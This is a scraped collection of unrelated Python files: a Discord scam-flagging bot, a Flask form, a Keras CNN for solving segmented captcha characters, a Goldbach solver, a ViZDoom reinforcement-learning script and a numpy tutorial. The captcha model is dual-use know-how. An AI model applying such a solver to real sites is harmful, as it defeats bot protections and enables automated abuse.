crypto address.\")\r\n return\r\n \r\n # Automated flagging using classifier\r\n if (self.check_classifier(message)):\r\n self.db.add_not_severe(message.id)\r\n return\r\n\r\n def create_report(self, author, time, description):\r\n '''\r\n Given information about a report, create a dictionary representation of the report.\r\n '''\r\n report_dict = {\r\n 'author': author,\r\n 'time': time,\r\n 'description': description\r\n }\r\n return report_dict\r\n\r\n def check_blacklist(self, message):\r\n with open(\"blacklist.txt\", \"r\") as file:\r\n addresses = file.readlines()\r\n for add in addresses:\r\n add = add.strip()\r\n if add in message.content:\r\n return True\r\n return False\r\n \r\n def check_classifier(self, message):\r\n\r\n # Check if messages are disguised in unicode\r\n content_decoded = unidecode(message.content, errors='preserve')\r\n if content_decoded != message.content:\r\n message.content = content_decoded\r\n\r\n string = message.content\r\n contains_btc_add = bool(re.search(\"[13][a-km-zA-HJ-NP-Z1-9]{25,34}\", string))\r\n contains_eth_add = bool(re.search(\"0x[a-fA-F0-9]{40}$\", string))\r\n phrases = ['legit', 'legitimate', 'send me', 'double', 'whatsapp']\r\n legit_bot_phrases = ['transferred from', 'move from']\r\n contains_scam_phrase = False\r\n for phrase in phrases:\r\n if phrase in string.lower():\r\n contains_scam_phrase = True\r\n contains_legit_phrase = False\r\n for phrase in legit_bot_phrases:\r\n if phrase in string.lower():\r\n contains_legit_phrase = True\r\n return ((not contains_legit_phrase) and (contains_btc_add or contains_eth_add or contains_scam_phrase))\r\n \r\n \r\nclient = ModBot(perspective_key)\r\nclient.run(discord_token)","repo_name":"alexjwang/cs152-group23","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":13053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"15126077008","text":"from flask_wtf import FlaskForm\nfrom wtforms import (DateField, RadioField, 
SelectField, SubmitField,\n SelectMultipleField, StringField, widgets)\nfrom wtforms.validators import DataRequired\nfrom recipe_scheduler.events.widgets import MySelect\n\n\nclass EventForm(FlaskForm):\n \"\"\"\n Form for recipe site\n \"\"\"\n event_date = DateField(\n 'Date',\n validators=[DataRequired()]\n )\n event_type = RadioField(\n 'Type',\n choices=[(\"0\", \"Breakfast\"), (\"1\", \"Lunch\"), (\"2\", \"Dinner\")],\n default=\"0\"\n )\n category_id = SelectField(\n 'Category',\n coerce=int\n )\n recipe_id = SelectField(\n 'Recipe',\n coerce=int,\n widget=MySelect()\n )\n submit = SubmitField('Post')\n\n\nclass MultiCheckboxField(SelectMultipleField):\n widget = widgets.ListWidget(prefix_label=False)\n option_widget = widgets.CheckboxInput()\n\n\nclass RandomEventForm(FlaskForm):\n event_date = StringField(\n 'Date',\n validators=[DataRequired()]\n )\n event_type = MultiCheckboxField(\n 'Types',\n choices=[('0', 'breakfast'), ('1', 'lunch'), ('2', 'dinner')]\n )\n categories = MultiCheckboxField(\n 'Categories',\n coerce=int\n )\n submit = SubmitField('Random')\n","repo_name":"gadenahi/recipe-scheduler","sub_path":"recipe_scheduler/events/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"34559048503","text":"import os\r\nimport tensorflow as tf\r\nfrom tensorflow.python.keras import *\r\nfrom tensorflow.python.keras.layers import *\r\nfrom tensorflow.python.keras.optimizers import RMSprop,Adam\r\nfrom tensorflow.python.keras.models import load_model\r\nfrom tensorflow.python.keras.callbacks import EarlyStopping\r\nfrom tensorflow.python.keras.preprocessing.image import ImageDataGenerator,load_img,img_to_array\r\n\r\n\r\n# define some Environmental variable\r\nNOW_PATH = str(os.getcwd()).replace('\\\\', '/') + \"/\"\r\nTRAIN_PATH = os.path.join(NOW_PATH ,'WEBLMT_train_divide/')\r\nVALID_PATH = os.path.join(NOW_PATH,'WEBLMT_test_divide/')\r\nMODEL_PATH = os.path.join(NOW_PATH ,'./model/capcha_model.h5')\r\n\r\nDIVIDE_IMAGE_HEIGHT = 16\r\nDIVIDE_IMAGE_WEIGHT = 16\r\n\r\nDIVIDE_LABEL_SIZE = 36\r\n\r\nBATCH_SIZE = 300\r\nLEARN_RATE = 0.00025\r\n\r\nclass CaptchaTensorFlow(object):\r\n def __init__(self, learn_rate=LEARN_RATE, train_path=TRAIN_PATH, valid_path=VALID_PATH, model_path = MODEL_PATH):\r\n self.learn_rate = learn_rate\r\n self.train_path = train_path\r\n self.valid_path = valid_path\r\n self.model_path = MODEL_PATH\r\n self.model = self.build_model()\r\n self.captcha_class = []\r\n for i in range(36):\r\n if i < 10:\r\n self.captcha_class.append(str(i))\r\n else:\r\n self.captcha_class.append(chr(i + 87))\r\n\r\n def build_model(self):\r\n img_input = layers.Input(shape=(DIVIDE_IMAGE_HEIGHT,DIVIDE_IMAGE_WEIGHT,1))\r\n x = layers.Conv2D(64,3,strides=(1, 1),padding='same',activation='relu')(img_input)\r\n x = layers.MaxPool2D(pool_size=(2, 2),strides=(2, 2),padding='SAME')(x)\r\n\r\n x = layers.Conv2D(128,3,strides=(1, 1),padding='same',activation='relu')(x)\r\n x = layers.MaxPool2D(pool_size=(2, 2),strides=(2, 2),padding='SAME')(x)\r\n\r\n x = layers.Conv2D(256,3,strides=(1, 1),padding='same',activation='relu')(x)\r\n x = layers.MaxPool2D(pool_size=(2, 2),strides=(2, 2),padding='SAME')(x)\r\n\r\n x = layers.Flatten()(x)\r\n\r\n x = layers.Dense(1080,activation='relu')(x)\r\n x = layers.Dropout(rate = 0.9)(x)\r\n\r\n output = layers.Dense(DIVIDE_LABEL_SIZE,activation='softmax')(x)\r\n model = Model(img_input,output)\r\n return model\r\n\r\n\r\n 
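# note: train() below assumes TRAIN_PATH and VALID_PATH each contain one subdirectory per character class, since flow_from_directory infers labels from folder names\r\n    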
def train(self):\r\n #下面使用高阶语句构建模型\r\n model = self.build_model()\r\n model.compile(loss='categorical_crossentropy',\r\n # optimizer=RMSprop(lr=0.001),\r\n optimizer = Adam(lr=self.learn_rate),\r\n # optimizer=tf.train.AdamOptimizer(learning_rate=self.learn_rate),\r\n metrics=['accuracy'])\r\n\r\n callbacks = [EarlyStopping(\r\n monitor='val_loss', patience=2)]\r\n\r\n # All images will be rescaled by 1./255\r\n train_datagen = ImageDataGenerator(rescale=1./255)\r\n test_datagen = ImageDataGenerator(rescale=1./255)\r\n\r\n # Flow training images in batches of 20 using train_datagen generator\r\n train_generator = train_datagen.flow_from_directory(\r\n self.train_path, # This is the source directory for training images\r\n target_size=(DIVIDE_IMAGE_HEIGHT,DIVIDE_IMAGE_WEIGHT), \r\n color_mode='grayscale',\r\n batch_size=BATCH_SIZE,\r\n # Since we use binary_crossentropy loss, we need binary labels\r\n class_mode='categorical')\r\n\r\n # Flow validation images in batches of 20 using test_datagen generator\r\n validation_generator = test_datagen.flow_from_directory(\r\n self.valid_path,\r\n target_size=(DIVIDE_IMAGE_HEIGHT,DIVIDE_IMAGE_WEIGHT),\r\n color_mode='grayscale',\r\n batch_size=BATCH_SIZE,\r\n class_mode='categorical')\r\n\r\n history = model.fit_generator(\r\n train_generator,\r\n epochs=1000,\r\n callbacks=callbacks,\r\n validation_data=validation_generator,\r\n verbose=2)\r\n self.model = model\r\n model.save(self.model_path)\r\n #########################这是分界线#################\r\n\r\n def loadModel(self,model_path=None):\r\n if model_path is not None:\r\n self.model_path = model_path\r\n self.model = load_model(self.model_path)\r\n \r\n def predict(self,pic_array):\r\n pred = self.model.predict(pic_array)\r\n return pred\r\n\r\n def bitsToResult(self,pred):\r\n pred_list = list(pred.reshape(DIVIDE_LABEL_SIZE))\r\n return self.captcha_class[pred_list.index(1)]\r\n\r\n# test_img = 'WEBLMT_test_divide/2/0010-2.png'\r\ntest_img = 'WEBLMT_test_divide/f/0002-0.png'\r\nlabels = []\r\nif __name__ == '__main__':\r\n train_nn = CaptchaTensorFlow()\r\n choice = input(\"1、Train\\n2、Test\\n\")\r\n if choice == '1':\r\n train_nn.train()\r\n else:\r\n train_nn.loadModel()\r\n pic = load_img(test_img,grayscale=True)\r\n pic_array = img_to_array(pic).reshape(1,DIVIDE_IMAGE_HEIGHT,DIVIDE_IMAGE_HEIGHT,1)\r\n pred = train_nn.predict(pic_array)\r\n\r\n result = train_nn.bitsToResult(pred)\r\n print(result)\r\n\r\n\r\n\r\n","repo_name":"YangXi2016/captcha","sub_path":"Captcha_tensorflow_keras.py","file_name":"Captcha_tensorflow_keras.py","file_ext":"py","file_size_in_byte":5115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"44615199376","text":"# 17103 골드바흐 파티션\nimport sys\n\ndef eratos(n): # 에라토스테네스의 체\n sieve = [True] * (n+1) # 체\n sieve[0], sieve[1] = [False] * 2\n\n # n의 최대 약수가 sqrt(n) 이하이므로 i=sqrt(n)까지 검사\n sqrtN = int((n+1) ** 0.5)\n for i in range(2, sqrtN + 1):\n if sieve[i]: # i가 소수인 경우\n for j in range((i+i), (n+1), i): # i이후 i의 배수들을 False 판정\n sieve[j] = False\n\n # primeArr 생성\n # primeArr = list()\n # for i in range(2, (n+1)):\n # if sieve[i]:\n # primeArr.append(i)\n\n return sieve\n\ndef main():\n t = int(sys.stdin.readline())\n inputN = list()\n for _ in range(t):\n inputN.append(int(sys.stdin.readline()))\n\n sieve = eratos(max(inputN))\n for n in inputN:\n cnt = 0\n for i in range(n // 2 + 1):\n if sieve[i] and sieve[n-i]:\n cnt += 1\n print(cnt)\n\n 
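# each pair (i, n-i) with i <= n//2 is checked once, so every Goldbach partition is counted exactly once\n    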
return\n\nmain()\n","repo_name":"coding-study-19/datastructure-and-algorithm","sub_path":"datastructure/수학/에라토스테네스의 체/17103_es.py","file_name":"17103_es.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"1071919154","text":"import itertools as it\nfrom random import sample, randint, random, choice, shuffle\nfrom time import time, sleep\nimport numpy as np\nimport skimage.color, skimage.transform\nimport tensorflow as tf\nfrom tqdm import trange\nimport vizdoom as vzd\nimport glob\nfrom vizdoom import *\nimport pickle\nimport matplotlib.pyplot as plt\n#from doom_utils import *\nfrom collections import deque\n\n\nactions = [\n\n[0,0,0,0,0,0,0,0],\n\n[1,0,0,0,0,0,0,0],\n[0,1,0,0,0,0,0,0],\n#[0,0,1,0,0,0,0,0],\n#[0,0,0,1,0,0,0,0],\n[0,0,0,0,1,0,0,0],\n[0,0,0,0,0,1,0,0],\n[0,0,0,0,0,0,1,0],\n[0,0,0,0,0,0,0,1],\n\n#[0,0,1,0,0,1,0,0],\n#[0,0,1,0,1,0,0,0],\n#[0,0,0,1,0,1,0,0],\n#[0,0,0,1,1,0,0,0],\n\n[0,0,0,0,0,1,1,0],\n[0,0,0,0,0,1,0,1],\n[0,0,0,0,1,0,1,0],\n[0,0,0,0,1,0,0,1],\n\n\n[1,0,0,0,0,1,0,0],\n[1,0,0,0,1,0,0,0],\n#[1,0,0,1,0,0,0,0],\n#[1,0,1,0,0,0,0,0],\n\n#[1,0,1,0,0,1,0,0],\n#[1,0,1,0,1,0,0,0],\n[1,0,0,1,0,1,0,0],\n[1,0,0,1,1,0,0,0],\n\n[1,0,0,0,0,1,1,0],\n[1,0,0,0,0,1,0,1],\n[1,0,0,0,1,0,1,0],\n[1,0,0,0,1,0,0,1],\n\n\n[0,1,0,0,0,1,0,0],\n[0,1,0,0,1,0,0,0],\n#[0,1,0,1,0,0,0,0],\n#[0,1,1,0,0,0,0,0],\n\n#[0,1,1,0,0,1,0,0],\n#[0,1,1,0,1,0,0,0],\n#[0,1,0,1,0,1,0,0],\n#[0,1,0,1,1,0,0,0],\n\n[0,1,0,0,0,1,1,0],\n[0,1,0,0,0,1,0,1],\n[0,1,0,0,1,0,1,0],\n[0,1,0,0,1,0,0,1],\n\n[1,0,0,0,0,0,0,1],\n[1,0,0,0,0,0,1,0],\n[0,1,0,0,0,0,0,1],\n[0,1,0,0,0,0,1,0]\n]\n\n\ndef dist_from_goal(current_pos, starting_pos, goal_pos):\n\n x_disp = starting_pos[0] - current_pos[0]\n y_disp = starting_pos[1] - current_pos[1]\n\n x_dist_from_goal = x_disp - goal_pos[0]\n y_dist_from_goal = y_disp - goal_pos[1]\n\n return np.sqrt((x_dist_from_goal ** 2) + (y_dist_from_goal ** 2)), x_disp, y_disp\n\ndef preprocess(img):\n\n img = np.rollaxis(img, 0, 3)\n img = img[:,:,0] #should be red channel\n img = img[80:380, 40:600]\n img = skimage.transform.resize(img, (60,108))\n img = img.astype(np.float32)\n\n img = 2.0 * img - 1.0\n\n return img\n\ndef create_coord_channels(img):\n # run this just once at beginning, then stack each training step\n\n rows, cols = img.shape\n\n row_coords = np.arange(cols)\n row_coords = 2*row_coords/cols\n row_coords = row_coords - 1.0\n row_coords = np.tile(row_coords, [rows,1])\n\n col_coords = np.arange(rows)\n col_coords = 2*col_coords/rows\n col_coords = col_coords - 1.0\n col_coords = np.tile(col_coords, [cols,1])\n col_coords = np.transpose(col_coords)\n\n return row_coords, col_coords\n\nclass ReplayMemory:\n def __init__(self, capacity, channels, resolution):\n #channels =\n state1_shape = (capacity, resolution[0], resolution[1], channels)\n #print(state1_shape)\n #state2_shape = (capacity, resolution[0], resolution[1], 1)\n self.s1 = np.zeros(state1_shape, dtype=np.float32)\n self.s2 = np.zeros(state1_shape, dtype=np.float32)\n self.a = np.zeros(capacity, dtype=np.int32)\n self.r = np.zeros(capacity, dtype=np.float32)\n self.isterminal = np.zeros(capacity, dtype=np.float32)\n\n self.capacity = capacity\n self.size = 0\n self.pos = 0\n\n def add_transition(self, s1, action, s2, isterminal, reward):\n self.s1[self.pos, :, :, :] = s1\n self.a[self.pos] = action\n if not isterminal:\n self.s2[self.pos, :, :, :] = s2\n self.isterminal[self.pos] = isterminal\n self.r[self.pos] = 
reward\n\n self.pos = (self.pos + 1) % self.capacity\n self.size = min(self.size + 1, self.capacity)\n\n def get_sample(self, sample_size):\n i = sample(range(0, self.size), sample_size)\n return self.s1[i], self.a[i], self.s2[i], self.isterminal[i], self.r[i]\n\ndef create_network(session, available_actions_count, resolution, channels, learning_rate):\n # Create the input variables\n s1_ = tf.placeholder(tf.float32, [None] + list(resolution) + [channels], name=\"State\")\n a_ = tf.placeholder(tf.int32, [None], name=\"Action\")\n target_q_ = tf.placeholder(tf.float32, [None, available_actions_count], name=\"TargetQ\")\n\n # Add 2 convolutional layers with ReLu activation\n conv1 = tf.contrib.layers.convolution2d(s1_, num_outputs=128, kernel_size=[8, 8], stride=[3, 3],\n activation_fn=tf.nn.relu,\n weights_initializer=tf.contrib.layers.xavier_initializer_conv2d(),\n biases_initializer=tf.constant_initializer(0.1))\n\n conv2 = tf.contrib.layers.convolution2d(conv1, num_outputs=128, kernel_size=[3, 3], stride=[2, 2],\n activation_fn=tf.nn.relu,\n weights_initializer=tf.contrib.layers.xavier_initializer_conv2d(),\n biases_initializer=tf.constant_initializer(0.1))\n\n conv2_flat = tf.contrib.layers.flatten(conv2)\n\n\n fc1 = tf.contrib.layers.fully_connected(conv2_flat, num_outputs=128, activation_fn=tf.nn.relu,\n weights_initializer=tf.contrib.layers.xavier_initializer(),\n biases_initializer=tf.constant_initializer(0.1))\n\n fc2 = tf.contrib.layers.fully_connected(fc1, num_outputs=32, activation_fn=tf.nn.relu,\n weights_initializer=tf.contrib.layers.xavier_initializer(),\n biases_initializer=tf.constant_initializer(0.1))\n\n\n q = tf.contrib.layers.fully_connected(fc2, num_outputs=available_actions_count, activation_fn=None,\n weights_initializer=tf.contrib.layers.xavier_initializer(),\n biases_initializer=tf.constant_initializer(0.1))\n best_a = tf.argmax(q, 1)\n\n loss = tf.losses.mean_squared_error(q, target_q_)\n\n optimizer = tf.train.RMSPropOptimizer(learning_rate)\n # Update the parameters according to the computed gradient using RMSProp.\n train_step = optimizer.minimize(loss)\n\n def function_learn(s1, target_q):\n feed_dict = {s1_: s1, target_q_: target_q}\n l, _ = session.run([loss, train_step], feed_dict=feed_dict)\n return l\n\n def get_loss(s1, target_q):\n feed_dict = {s1_: s1, target_q_: target_q}\n l = session.run([loss], feed_dict=feed_dict)\n return l\n\n def function_get_q_values(state):\n return session.run(q, feed_dict={s1_: state})\n\n def function_get_best_action(state):\n return session.run(best_a, feed_dict={s1_: state})\n\n def function_simple_get_best_action(state,channels):\n return function_get_best_action(state.reshape([1, resolution[0], resolution[1], channels]))[0]\n\n return function_learn, function_get_q_values, function_simple_get_best_action\n\ndef learn_from_memory(memory):\n \"\"\" Learns from a single transition (making use of replay memory).\n s2 is ignored if s2_isterminal \"\"\"\n\n # Get a random minibatch from the replay memory and learns from it.\n if memory.size > batch_size:\n s1, a, s2, isterminal, r = memory.get_sample(batch_size)\n\n q2 = np.max(get_q_values(s2), axis=1)\n target_q = get_q_values(s1)\n # target differs from q only for the selected action. 
The following means:\n # target_Q(s,a) = r + gamma * max Q(s2,_) if not isterminal else r\n target_q[np.arange(target_q.shape[0]), a] = r + discount_factor * (1 - isterminal) * q2\n learn(s1, target_q)\n\ndef perform_learning_step_stack(memory, epoch, initial_position, frame_queue, r, c, frame_grabs):\n \"\"\" Makes an action according to eps-greedy policy, observes the result\n (next state, reward) and learns from the transition\"\"\"\n\n channels = 5\n\n def exploration_rate(epoch):\n \"\"\"# Define exploration rate change over time\"\"\"\n start_eps = 0.4\n end_eps = 0.05\n const_eps_epochs = 0.05 * epochs # 10% of learning time\n eps_decay_epochs = 0.5 * epochs # 80% of learning time\n\n if epoch < const_eps_epochs:\n return start_eps\n elif epoch < eps_decay_epochs:\n # Linear decay\n return start_eps - (epoch - const_eps_epochs) / \\\n (eps_decay_epochs - const_eps_epochs) * (start_eps - end_eps)\n else:\n return end_eps\n\n s1 = preprocess(game.get_state().screen_buffer)\n\n #if epoch % 3 == 0:\n\n # print(s1.shape)\n\n frame_queue.append(s1)\n frame_queue.popleft()\n\n frames = [frame_queue[x] for x in frame_grabs]\n frames.append(r)\n frames.append(c)\n\n state_1 = np.dstack(frames)\n\n # With probability eps make a random action.\n eps = exploration_rate(epoch)\n\n if random() <= eps:\n a = randint(0, len(actions) - 1)\n else:\n # Choose the best action according to the network.\n a = get_best_action(state_1, channels)\n\n # Extrinsic reward\n extrinsic_reward = game.make_action(actions[a], frame_repeat)\n\n # insert if statement if its close enough turn off coords\n # if\n # intrinsic position reward\n current_pos = [game.get_game_variable(GameVariable.POSITION_X),\n game.get_game_variable(GameVariable.POSITION_Y)]\n\n\n\n dist, x, y = dist_from_goal(current_pos, initial_pos, goal_position)\n\n dist_reward = -1 * dist\n\n if dist < 200:\n\n reward = extrinsic_reward\n\n elif extrinsic_reward < -50000:\n\n #print('Death!')\n\n reward = dist_reward + extrinsic_reward\n\n else:\n\n reward = dist_reward\n\n isterminal = game.is_episode_finished()\n\n fin = 0\n\n if isterminal:\n\n #print('total reward:', game.get_total_reward())\n\n #if extrinsic_reward < -40000:\n\n #print('DEAD!')\n\n if game.get_total_reward() > -1 * episode_timeout:\n\n fin = 1\n\n reward = 10000\n\n print('found the exit!!')\n\n if not isterminal:\n\n s2 = preprocess(game.get_state().screen_buffer)\n\n else:\n\n s2 = np.zeros((60,108))\n\n frame_queue.append(s2)\n frame_queue.popleft()\n\n frames = [frame_queue[x] for x in frame_grabs]\n frames.append(r)\n frames.append(c)\n\n state_2 = np.dstack(frames)\n\n #print(state_1.shape)\n #print(s2.shape)\n\n # Remember the transition that was just experienced.\n memory.add_transition(state_1, a, state_2, isterminal, reward)\n\n print(reward)\n\n plt.figure()\n\n plt.subplot(141)\n plt.imshow(state_1[:,:,-1])\n\n plt.subplot(142)\n plt.imshow(state_1[:,:,-2])\n\n plt.subplot(143)\n plt.imshow(state_1[:,:,-3])\n\n plt.subplot(144)\n plt.imshow(state_1[:,:,0])\n\n plt.show()\n\n\n learn_from_memory(memory)\n return reward, x, y, fin, frame_queue\n\n# Creates and initializes ViZDoom environment.\ndef initialize_vizdoom(config_file_path, wad_file_path, difficulty):\n\n print(\"Initializing doom...\")\n game = vzd.DoomGame()\n\n game.load_config(config_file_path)\n game.set_doom_scenario_path(wad_file_path)\n\n game.set_window_visible(True)\n game.set_mode(vzd.Mode.PLAYER)\n #game.set_screen_format(vzd.ScreenFormat.GRAY8)\n 
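# 640x480 is assumed by preprocess(), which keeps the red channel, crops [80:380, 40:600] and resizes to 60x108\n    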
game.set_screen_resolution(vzd.ScreenResolution.RES_640X480)\n\n game.set_doom_skill(difficulty)\n\n\n game.init()\n print(\"Doom initialized.\")\n\n return game\n\n\nlearning_rate = 0.001\ndiscount_factor = 0.99\n\nepochs = 50\nepisodes_per_epoch = 50\n\nepisode_timeout = 4000\n\nreplay_memory_size = 25000\n\nbatch_size = 64\n\nframe_repeat = 12\n\nresolution = (60,108)\n\nframe_q_length = 10\nframe_grabs = [-1,-3,-8]\n\nchannels = len(frame_grabs) + 2\n# +2 for r and c!\n\n\ngoal_dictionary = {\n'oblige_29_no_mon': (1040,1220)\n}\n\ntraining_wads = ['oblige_29_no_mon.wad']\n\nwad_prefix = 'wad_files/'\n\nsave_model = True\nload_model = True\n\nDEFAULT_MODEL_SAVEFILE = \"saved_models/model_1/model_1\"\nDEFAULT_MODEL_LOADFILE = \"saved_models/model_1/model_1\"\n\nconfig = 'configs/standard_config.cfg'\n\ninit_wad = wad_prefix + training_wads[0]\n\ngame = initialize_vizdoom(config, init_wad, 1)\n\n\nmemory = ReplayMemory(replay_memory_size, channels, resolution)\n\nsession = tf.Session()\nlearn, get_q_values, get_best_action = create_network(session, len(actions), resolution, channels, learning_rate)\nsaver = tf.train.Saver()\n\nif load_model:\n\n print(\"Loading model from: \", DEFAULT_MODEL_LOADFILE)\n saver.restore(session, DEFAULT_MODEL_LOADFILE)\n\nelse:\n\n init = tf.global_variables_initializer()\n session.run(init)\n\n\ngame.add_game_args(\"+freelook 1\")\ngame.set_screen_resolution(vzd.ScreenResolution.RES_640X480)\ngame.set_window_visible(True)\ngame.set_mode(vzd.Mode.SPECTATOR)\n\ngame.init()\n\ngame.new_episode()\n\ninit_state = game.get_state()\ninit_screen = init_state.screen_buffer\ninit_screen = preprocess(init_screen)\n\n# Need to initialize queue every episode!\n# To prevent the exit frames from going into the beginning of the next one\n\n\n\nrow_coords, col_coords = create_coord_channels(init_screen)\n\n#frame_queue = deque([np.zeros(init_screen.shape)] * frame_q_length)\n\n\nexit_percent_collector = []\n\nplt.figure()\n\nfor epoch in range(epochs):\n\n print('Epoch:', str(epoch + 1), 'out of', epochs)\n\n\n train_episodes_finished = 0\n exit_counter = 0\n\n shuffle(training_wads)\n\n for current_wad in training_wads:\n\n wad_file = current_wad\n\n m_wad = wad_prefix + wad_file\n\n goal_position = goal_dictionary[wad_file[:-4]]\n\n print(m_wad, goal_position)\n\n game = initialize_vizdoom(config, m_wad, 1)\n\n initial_pos = [game.get_game_variable(GameVariable.POSITION_X),\n game.get_game_variable(GameVariable.POSITION_Y)]\n\n\n game.new_episode()\n frame_queue = deque([np.zeros(init_screen.shape)] * frame_q_length)\n\n current_ep = 0\n\n while current_ep < episodes_per_epoch:\n\n while not game.is_episode_finished():\n\n r,x,y,fin,frame_queue = perform_learning_step_stack(memory, epoch, initial_pos, frame_queue, row_coords, col_coords, frame_grabs)\n\n if game.is_episode_finished():\n\n #print('episode complete!')\n\n game.new_episode()\n frame_queue = deque([np.zeros(init_screen.shape)] * frame_q_length)\n\n current_ep += 1\n\n exit_counter += fin\n\n train_episodes_finished += 1\n\n\n\n\n game.close()\n\n print('')\n exit_percent_collector.append(float(exit_counter) /train_episodes_finished)\n\n plt.clf()\n plt.plot(exit_percent_collector)\n plt.pause(0.1)\n\n\n print(\"Saving the network weigths to:\", DEFAULT_MODEL_SAVEFILE)\n saver.save(session, DEFAULT_MODEL_SAVEFILE)\n\nplt.show()\n\n\n\n\n\n'''\n\n#plt.figure()\n\nwhile not game.is_episode_finished():\n\n state = game.get_state()\n time = game.get_episode_time()\n\n game.advance_action()\n last_action = 
game.get_last_action()\n reward = game.get_last_reward()\n\n screen = state.screen_buffer\n screen = preprocess(screen)\n\n z = np.dstack((screen, r, c))\n\n frame_queue.append(screen)\n frame_queue.popleft()\n\n frames = [frame_queue[x] for x in frame_grabs]\n frames.append(r)\n frames.append(c)\n print(len(frames))\n\n frames = np.dstack(frames)\n\n print(frames.shape)\n\n #plt.imshow(frames[:,:,-1] - frames[:,:,-2])\n #plt.pause(0.01)\n'''\n","repo_name":"paulgowdy/crowdAI_doom","sub_path":"full_model_1.py","file_name":"full_model_1.py","file_ext":"py","file_size_in_byte":15111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"7345709238","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- \n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# tableau une dimension\na = np.array([1,2,3])\n# print(\"a :\", a)\n\n# tableau 2 dimensions, type float\nb = np.array([(1.4,2.4,5.5,6.6), (3.5,6.2,7.4,8.8)], dtype = float)\nprint(\"b :\", b)\n\nb = b.reshape(8 ,)\nprint(\"b :\", b)\n\n\nbb = np.array([(1.4,2.4), (3.5,6.2),(4.4,5.6)], dtype = float)\n# print(\"bb :\", bb)\n\n# placeholder = espace reserve\n\n\n# genere les lignes (rows) avec un \n# numpy.random.randn(10, 10) : array 2d de 10 x 10 nombres dune distribution gaussienne standard(moyenne 0, ecart-type 1).\n\n# Pour les nombres [1,2,3], la moyenne est de 2, la variance est 0,667\n# [(1 - 2)2 + (2 - 2)2 + (3 - 2)2] ÷ 3 = 0,667\n# [somme de l'écart au carré] ÷ nombre d'observations = variance\n\n# Variance, S2 = moyenne de l ecart au carre de valeurs par rapport a la moyenne\n# Comme le calcul de la variance se fait a partir des carres des ecarts, les unites de mesure ne sont pas les memes que celles des observations originales. Par exemple, les longueurs mesurees en metres (m) ont une variance mesuree en metres carres (m2).\n# La racine carree de la variance nous donne les unites utilisees dans l echelle originale.\n\n# ecart-type (S) = Racine carree de la variance\n# L ecart-type est la mesure de dispersion la plus couramment utilisee en statistique lorsqu on emploie la moyenne pour calculer une tendance centrale. Il mesure donc la dispersion autour de la moyenne. 
En raison de ses liens etroits avec la moyenne, l ecart-type peut etre grandement influence si cette derniere donne une mauvaise mesure de tendance centrale.\n\n\n# ecart type: \n\n# numpy.random.randn(nombre_de_rows, nombre_de_dimension) \n\naa = np.random.randn(10, 10)\n# print(\"aa :\", aa)\n\nab = np.random.randn(10, 2)\n# print(\"ab :\", ab)\n\n\n\n# extrait\nrow_per_class = 2\n\nc = np.random.randn(row_per_class, 2)\n# print(\"c :\", c)\n\nd = np.random.randn(row_per_class, 2)\n# print(\"d :\", d)\n\ne = c + np.array([-2, -2])\n# print(\"e :\", e)\n\nf = d + np.array([2, 2])\n# print(\"f :\", f)\n\n\n\n\n# Generate rows\nsick = np.random.randn(row_per_class, 2) + np.array([-2, -2])\nsick_2 = np.random.randn(row_per_class, 2) + np.array([2, 2])\n\nhealthy = np.random.randn(row_per_class, 2) + np.array([-2, 2])\nhealthy_2 = np.random.randn(row_per_class, 2) + np.array([2, -2])\n# print(\"sick: \", sick)\n# print(\"sick_2: \", sick_2)\n# print(\"healthy: \", healthy)\n# print(\"healthy_2: \", healthy_2)\n\nfeatures = np.vstack([sick, sick_2, healthy, healthy_2])\n# print(\"features: \", features)\n\nfeatures2 = np.concatenate([sick, sick_2, healthy, healthy_2])\n# print(\"features2: \", features2)\n\ng = np.array([[1,2,3],[4,5,6]])\nh = np.array([[11,12,13],[14,15,16]])\ni = np.vstack([g,h]) # \nj = np.concatenate((g,h),axis=0)\n# print(\"g :\", g)\n# print(\"h :\", h)\n# print(\"i :\", i)\n# print(\"j :\", j)\n\n\n\n\n\ndef get_dataset():\n \"\"\"\n Method used to generate the dataset\n \"\"\"\n # Numbers of row per class\n row_per_class = 10\n # Generate rows\n # np.random.randn(row_per_class, 2) = genere des points proches de 0, et l'addition de l'array place dans le bon cadran\n sick = np.random.randn(row_per_class, 2) + np.array([-2, -2])\n sick_2 = np.random.randn(row_per_class, 2) + np.array([2, 2])\n\n healthy = np.random.randn(row_per_class, 2) + np.array([-2, 2])\n healthy_2 = np.random.randn(row_per_class, 2) + np.array([2, -2])\n\n features = np.vstack([sick, sick_2, healthy, healthy_2])\n targets = np.concatenate((np.zeros(row_per_class * 2), np.zeros(row_per_class * 2) + 1))\n targets2 = np.arange(40)\n print(\"features:\", features)\n print(\"targets:\", targets)\n\n\n targets = targets.reshape(40,)\n\n return features, targets\n\nif __name__ == '__main__':\n features, targets = get_dataset()\n # Plot points\n# plt.scatter(features[:, 0], features[:, 1], s=40, c=targets, cmap=plt.cm.Spectral)\n plt.scatter(features[:, 0], features[:, 1], c=targets, cmap=plt.cm.Spectral)\n\nplt.show()\n\n\n\n\n# import numpy as np\n\n\n\n\n\n\n\n\n### CODE ###\n\n# import matplotlib.pyplot as plt\n# import tensorflow as tf\n# import numpy as np\n\n# def get_dataset():\n# \"\"\"\n# Method used to generate the dataset\n# \"\"\"\n# # Numbers of row per class\n# row_per_class = 100\n# # Generate rows\n# np.random.randn(row_per_class, 2) = genere des points proches de 0, et l'addition de l'array place dans le bon cadran\n# sick = np.random.randn(row_per_class, 2) + np.array([-2, -2])\n# sick_2 = np.random.randn(row_per_class, 2) + np.array([2, 2])\n\n# healthy = np.random.randn(row_per_class, 2) + np.array([-2, 2])\n# healthy_2 = np.random.randn(row_per_class, 2) + np.array([2, -2])\n\n# features = np.vstack([sick, sick_2, healthy, healthy_2])\n# targets = np.concatenate((np.zeros(row_per_class * 2), np.zeros(row_per_class * 2) + 1))\n\n# targets = targets.reshape(400,) # nombre de 